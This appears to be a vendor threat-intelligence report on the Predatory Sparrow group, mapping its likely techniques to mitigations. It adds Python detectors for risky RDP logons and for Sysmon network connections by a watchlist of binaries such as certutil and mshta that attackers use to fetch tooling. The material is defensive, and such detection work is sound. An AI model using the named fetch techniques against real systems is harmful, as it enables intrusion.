Active since 2021, Predatory Sparrow (aka Gonjeshke Darande) has claimed responsibility for cyber attacks on Iranian industrial plants and critical infrastructure. In 2021, the group disrupted Iran’s nationwide network of 4,300 gas stations by disabling the system for purchasing fuel with government-issued subsidy cards. The following year, they escalated their activities by targeting three state-owned industrial steel factories, hijacking control systems to cause equipment malfunctions and molten steel spills, resulting in significant fire damage. Continuing their offensive into 2023, Predatory Sparrow claimed to have incapacitated 70 percent of Iranian gas station infrastructure, severely hampering the country’s fuel distribution capabilities.
Although Predatory Sparrow’s cyber attacks have garnered significant attention, the reluctance of Iran to disclose details related to assaults on its critical infrastructure has led to a lack of information regarding the group’s specific TTPs. Nevertheless, insights from the ReliaQuest Threat Research Team, particularly their analyses on the targeting of Operational Technology (OT) systems by Chinese Advanced Persistent Threat (APT) groups, allow us to infer the likely TTPs employed by entities akin to Predatory Sparrow in its operations against such targets. This knowledge base provides a foundational understanding of the operational methodologies potentially utilized by Predatory Sparrow in its cyber campaigns.
T1021.001: Remote Services: Remote Desktop Protocol
Adversaries may use valid accounts to log in to a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Threat actors such as Predatory Sparrow can use this technique to move laterally to the domain controller (DC) via an interactive RDP session using a compromised account with domain administrator privileges. Combat this threat by:
Disabling remote interactive logon of service accounts to prevent them from being used for RDP.
Configuring and enabling MFA for RDP sessions, helping to prevent lateral RDP and RDP brute-forcing.
Adhering to the principle of least privilege and minimizing RDP to only the required accounts. Configure access to critical assets that require RDP to use designated jump boxes, allowing tighter access control and improved auditing.
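Once RDP is confined to designated jump boxes and service accounts are barred from interactive logon, both controls become testable against the Security log: a logon type 10 (RemoteInteractive) event 4624 on a domain controller should only ever come from a bastion address, and a service account should never appear in one at all. The detector below is added to this report and is not ReliaQuest code; the host names, jump box addresses, the svc_ naming convention and the events themselves are constructed.

```python
"""Detection of risky RDP logons from Windows Security event 4624 records: an
interactive RDP session (logon type 10) to a domain controller that did not
originate from a designated jump box, and RDP use of a service account.

Added example for this report; not ReliaQuest code. Host names, the jump box
addresses, the svc_ naming convention and the events are constructed.
"""
from __future__ import annotations

REMOTE_INTERACTIVE = "10"                 # LogonType for RDP (RemoteInteractive)
DOMAIN_CONTROLLERS = {"DC01", "DC02"}     # constructed Tier-0 host list
JUMP_BOXES = {"10.0.50.5", "10.0.50.6"}   # constructed bastion addresses
SERVICE_ACCOUNT_PREFIX = "svc_"           # constructed naming convention


def classify_logon(event: dict) -> list[str]:
    """Return the rule names a single 4624 event violates (empty if none)."""
    if event.get("EventID") != 4624 or event.get("LogonType") != REMOTE_INTERACTIVE:
        return []  # only successful RemoteInteractive logons are in scope
    hits = []
    target_host = event["Computer"].split(".")[0].upper()  # strip the DNS suffix
    if target_host in DOMAIN_CONTROLLERS and event["IpAddress"] not in JUMP_BOXES:
        hits.append("rdp-to-dc-not-from-jumpbox")
    if event["TargetUserName"].lower().startswith(SERVICE_ACCOUNT_PREFIX):
        hits.append("service-account-rdp-logon")
    return hits


def scan_logons(events: list[dict]) -> list[tuple[int, str]]:
    """(record id, rule) pairs for every violation in the event list."""
    return [(event["RecordId"], rule) for event in events for rule in classify_logon(event)]


SAMPLE_EVENTS = [  # constructed Security log records
    {"RecordId": 1, "EventID": 4624, "LogonType": "10", "TargetUserName": "jdoe",
     "IpAddress": "10.0.50.5", "Computer": "DC01.corp.example"},
    {"RecordId": 2, "EventID": 4624, "LogonType": "10", "TargetUserName": "da_admin",
     "IpAddress": "10.0.20.17", "Computer": "DC01.corp.example"},
    {"RecordId": 3, "EventID": 4624, "LogonType": "10", "TargetUserName": "svc_backup",
     "IpAddress": "10.0.20.17", "Computer": "FS01.corp.example"},
    {"RecordId": 4, "EventID": 4624, "LogonType": "3", "TargetUserName": "svc_backup",
     "IpAddress": "10.0.20.17", "Computer": "FS01.corp.example"},
    {"RecordId": 5, "EventID": 4624, "LogonType": "10", "TargetUserName": "jdoe",
     "IpAddress": "10.0.20.17", "Computer": "WS22.corp.example"},
]

if __name__ == "__main__":
    for record_id, rule in scan_logons(SAMPLE_EVENTS):
        print(record_id, rule)
```

Record 1 is the sanctioned path (administrator via the jump box), record 2 is the lateral movement pattern described above (a domain admin RDP session to the DC from a workstation), and record 3 is a service account used interactively. Record 4 is the same account's ordinary network logon and record 5 is workstation-to-workstation RDP, neither of which these two rules are meant to catch; a separate rule on repeated 4625 failures covers RDP brute-forcing.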
T1190: Exploit Public-Facing Application
Through this approach, attackers aim to leverage vulnerabilities in external-facing systems or devices to gain initial entry into a network. These vulnerabilities could stem from software bugs, temporary system faults, or configuration errors. Specifically, adversaries often target edge network devices and infrastructure components lacking strong host-based protections. APT groups frequently exploit flaws in networking appliances, including manufacturers like Fortinet, Ivanti, NETGEAR, Citrix, and Cisco, to infiltrate networks. To protect against these types of attacks, organizations can:
Utilize security tools, such as a web application firewall (WAF), to protect public-facing applications and provide logging visibility into access and requests to and from the application.
Properly segment all public-facing applications from the intranet to minimize risk of exploitation compromising sensitive infrastructure.
Adhere to a robust and frequent vulnerability assessment and patching cycle for all public-facing appliances. In case of a zero-day exploitation of a vulnerability, develop and maintain an emergency patch and mitigation plan.
T1105: Ingress Tool Transfer
This TTP allows attackers to import tools or files from an external source into a breached network. They might transfer these assets from a system they control to the target network either via the command-and-control (C2) channel or using other protocols like file transfer protocol (FTP). Once these tools or files are within the compromised environment, attackers can further distribute them across multiple devices within that network. For example, in the 2015 attack on Ukraine’s electric power facilities, the Sandworm Team, a Russian APT group, deployed additional malicious software onto already compromised systems to exfiltrate credentials, facilitate lateral movement, and ultimately destroy data. To defend against such tactics, organizations can implement the following processes.
Utilize application control solutions to block the less-common resource-retrieval methods that threat actors use to evade defenses, such as downloading files with “certutil.”
Maintain an up-to-date block list of known hosting sites and actively monitor outbound request attempts through your forward proxy.
If an endpoint detection and response (EDR) solution is not available, leverage Sysmon Event ID 3 to log and monitor process executions generating network connections.
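Sysmon Event ID 3 records every process that opens a network connection, which is enough to spot the retrieval methods named above without an EDR: a binary such as certutil reaching an address outside the corporate ranges is worth an alert regardless of what it fetched. The parser and rule below are added to this report and are not ReliaQuest code or a GreyMatter rule; the event XML, host names and destination addresses are constructed, the internal ranges are the RFC 1918 blocks, and the watchlist is a short illustrative set rather than a complete list.

```python
"""Parsing Sysmon Event ID 3 (network connection) records and flagging
outbound connections made by binaries commonly abused to fetch tooling, such
as certutil: the telemetry the recommendation above relies on when no EDR is
available.

Added example for this report; not ReliaQuest code or a GreyMatter rule. The
event XML, host names and addresses are constructed; internal ranges are the
RFC 1918 blocks and the watchlist is illustrative, not exhaustive.
"""
from __future__ import annotations

import ipaddress
import xml.etree.ElementTree as ET

SYSMON_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
WATCHED_IMAGES = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe", "powershell.exe"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_sysmon_events(xml_text: str) -> list[dict[str, str]]:
    """One flat dict per <Event>: EventID, Computer and every EventData field."""
    root = ET.fromstring(xml_text)
    events = []
    for event in root.findall("e:Event", SYSMON_NS):
        fields = {
            "EventID": event.findtext("e:System/e:EventID", default="", namespaces=SYSMON_NS),
            "Computer": event.findtext("e:System/e:Computer", default="", namespaces=SYSMON_NS),
        }
        for data in event.findall("e:EventData/e:Data", SYSMON_NS):
            fields[data.get("Name", "")] = data.text or ""
        events.append(fields)
    return events


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_lolbin_connections(xml_text: str) -> list[dict[str, str]]:
    """Event ID 3 records where a watched image connected to a non-internal address."""
    alerts = []
    for event in parse_sysmon_events(xml_text):
        if event["EventID"] != "3":
            continue
        image = event.get("Image", "").rsplit("\\", 1)[-1].lower()  # basename of a Windows path
        dest_ip = event.get("DestinationIp", "")
        if image in WATCHED_IMAGES and dest_ip and not is_internal(dest_ip):
            alerts.append({"host": event["Computer"], "image": image, "user": event.get("User", ""),
                           "dest": f"{dest_ip}:{event.get('DestinationPort', '')}"})
    return alerts


SAMPLE_SYSMON_XML = r"""<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <Event><System><EventID>3</EventID><Computer>WS22.corp.example</Computer></System>
    <EventData><Data Name="Image">C:\Program Files\Browser\browser.exe</Data><Data Name="User">CORP\jdoe</Data>
      <Data Name="DestinationIp">203.0.113.20</Data><Data Name="DestinationPort">443</Data></EventData></Event>
  <Event><System><EventID>3</EventID><Computer>WS22.corp.example</Computer></System>
    <EventData><Data Name="Image">C:\Windows\System32\certutil.exe</Data><Data Name="User">CORP\jdoe</Data>
      <Data Name="DestinationIp">203.0.113.77</Data><Data Name="DestinationPort">80</Data></EventData></Event>
  <Event><System><EventID>3</EventID><Computer>SRV07.corp.example</Computer></System>
    <EventData><Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
      <Data Name="User">CORP\svc_deploy</Data><Data Name="DestinationIp">10.0.0.5</Data>
      <Data Name="DestinationPort">5985</Data></EventData></Event>
  <Event><System><EventID>3</EventID><Computer>WS31.corp.example</Computer></System>
    <EventData><Data Name="Image">C:\Windows\System32\mshta.exe</Data><Data Name="User">CORP\asmith</Data>
      <Data Name="DestinationIp">198.51.100.40</Data><Data Name="DestinationPort">8080</Data></EventData></Event>
</Events>"""  # constructed events

if __name__ == "__main__":
    for alert in detect_lolbin_connections(SAMPLE_SYSMON_XML):
        print(alert)
```

The browser's outbound connection is ignored because the image is not on the watchlist, and PowerShell talking WinRM to an internal server is ignored because the destination is inside the RFC 1918 ranges; certutil and mshta reaching external addresses are the two alerts. Note that the TEST-NET addresses used here are treated as non-internal only because the rule checks the enterprise ranges explicitly; Python's `ip_address(...).is_private` would classify them as private, so the explicit list is the safer choice in a real rule as well.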
Threat Forecast
In the short to medium term, Israeli-linked groups, motivated by a need to thwart Iran’s influence and nuclear prospects, will likely seek to continue cyber espionage and disruption efforts. Furthermore, the use of cyber mercenaries or loosely affiliated hacktivist groups such as Predatory Sparrow introduces further unpredictable elements into the conflict, making attribution and response more challenging. Similarly, Iranian APT and hacktivist groups are poised to intensify their cyber campaigns against Israeli interests, employing tactics aimed at espionage, sabotage, and propaganda spread. As both nations continue to invest heavily in cyber defense and offensive capabilities, the potential for a significant cyber incident remains elevated.
Given these conditions, it is important for organizations, especially those with business interests in the affected nations, to keep abreast of developments. Staying informed about geopolitical shifts and related cyber threats is key to customizing security measures effectively. Enhancing their cybersecurity posture will enable organizations to protect their assets and maintain operational continuity amidst regional instability.
What ReliaQuest Is Doing
The ReliaQuest Threat Research team is monitoring these threat groups, continuously refining our detection capabilities and hunting methodologies to identify and alert our customers about significant TTPs utilized by adversaries like the groups mentioned in this report. Our threat hunting team actively monitors our customers’ public-facing infrastructure for exposed and susceptible services (such as RDP) that are commonly abused by threat actors looking to gain initial access.
In addition to creating specific detection rules for each of the TTPs mentioned, ReliaQuest also provides intelligence updates and detailed threat profiles through the GreyMatter Intelligence content library, covering aspects like TTPs, indicators of compromise (IoCs), tools, and information on specific attacks and campaigns. The ReliaQuest threat intelligence team also regularly incorporates high-fidelity IoCs into our threat intelligence feeds to enhance detection capabilities.